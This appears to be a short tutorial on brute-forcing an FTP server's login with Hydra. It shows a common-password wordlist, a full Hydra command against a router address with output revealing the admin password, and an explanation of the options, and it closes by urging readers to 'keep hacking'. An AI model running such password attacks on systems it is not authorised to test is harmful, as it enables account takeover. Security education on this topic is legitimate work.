Brute force password cracking
Hydra is a popular password cracking tool that can be used to brute force many services to find out the login password from a given wordlist. It is included in kali linux and is in the top 10 list. On ubuntu it can be installed from the synaptic package manager.
For brute forcing hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with john the ripper which is another password cracking tool. Another password list is available at dazzlepod.
John is pre-installed on Kali linux and its password list can be found at the following location
It looks like this
#!comment: This list has been compiled by Solar Designer of Openwall Project, #!comment: http://www.openwall.com/wordlists/ #!comment: #!comment: This list is based on passwords most commonly seen on a set of Unix #!comment: systems in mid-1990's, sorted for decreasing number of occurrences #!comment: (that is, more common passwords are listed first). It has been #!comment: revised to also include common website passwords from public lists #!comment: of "top N passwords" from major community website compromises that #!comment: occurred in 2006 through 2010. #!comment: #!comment: Last update: 2011/11/20 (3546 entries) 123456 12345 password password1 123456789 12345678 1234567890
Create a copy of that file to your desktop or any location and remove the comment lines (all the lines above the password 123456). Now our wordlist of passwords is ready and we are going to use this to brute force an ftp server to try to crack its password.
Here is the simple command with output
[email protected]:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18 [DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task [DATA] attacking service ftp on port 21 [VERBOSE] Resolving addresses ... done [ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0] [ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0] [ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0] [ftp] host: 192.168.1.1 login: admin password: password [STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33 [email protected]:~#
Check the line "[ftp]". It mentions the username/password combination that worked for the ftp server. Quite easy!
Now lets take a look at the options. The t option tells how many parallel threads hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a shortwhile. To avoid this its better to do 1 attempt at a time. The next option is "l" which tells the username or login to use. In this case its admin. Next comes the capital "P" option which provides the wordlist to use. Hydra will pickup each line as a single password and use it.
The "v" option is for verbose and the capital "V" option is for showing every password being tried. Last comes the host/ip address followed by the service to crack.
Brute forcing is the most basic form of password cracking techniques. In works well with devices like routers etc which are mostly configured with their default passwords. However when it comes to other systems, brute forcing will not work unless you are too lucky.
However still brute forcing is a good practice for hackers so you should keep trying all techniques to hack a system. So keep hacking!!